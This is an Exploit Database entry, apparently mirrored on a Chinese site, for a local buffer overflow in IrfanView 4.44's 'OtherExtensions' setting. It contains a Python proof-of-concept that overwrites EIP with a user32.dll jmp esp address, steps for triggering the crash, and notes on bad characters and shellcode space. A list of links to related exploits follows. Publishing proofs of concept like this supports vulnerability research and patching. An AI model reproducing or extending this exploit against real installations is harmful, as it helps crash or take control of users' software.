IrfanView 4.44 – Denial of Service

Exploit Database
100 阅读

作者： Dreivan Orprecio

日期： 2017-04-29
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/41949/

# Exploit Title: Irfanview - OtherExtensions Input Overflow
# Date: 29-04-2017
# Software Link: http://download.cnet.com/IrfanView/?part=dl-&subj=dl&tag=button
# Exploit Author: Dreivan Orprecio
#Version: Irfanview 4.44
#Irfanview is vulnerable to overflow in "OtherExtensions" input field
#Debugging Machine: WinXP Pro SP3 (32bit)


#POC

#!usr/bin/python


eip = "\xf7\x56\x44\x7e" #jmp esp from user32.dll



buffer = "OtherExtensions="+"A" *199 + eip + "\xcc" 

print buffer#a) irfanview->Option->Properties/Settings->Extensions
#b) Paste the buffer in the "other" input then press ok, repeat a) and b)





#badcharacters: those instruction that start with 6,7,8,E,F 
#Only 43 bytes space to host a shellcode and lots of badchars make it hard for this to exploit
#Any other way around this?

last Exploits
IrfanView 4.44 – Denial of Service的更多信息

Hanso Player 2.5.0 – ‘m3u’ Buffer Overflow (Denial of Service)：
NetScanTools Basic Edition 2.5 – ‘Hostname’ Denial of Service (PoC)：
Adobe Photoshop CS4 Extended 11.0 – ‘.ABR’ File Handling Remote Buffer Overflow (PoC)：
Microsoft Windows – ‘win32k!NtGdiEnumFonts’ Kernel Pool Memory Disclosure：
Winplot 2010 – Buffer Overflow (PoC)：
Microsoft Windows – GDI+ DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)：
Microsoft Edge – Out-of-Bounds Access when Fetching Source：
Adobe Flash – Crash When Freeing Memory After AVC decoding：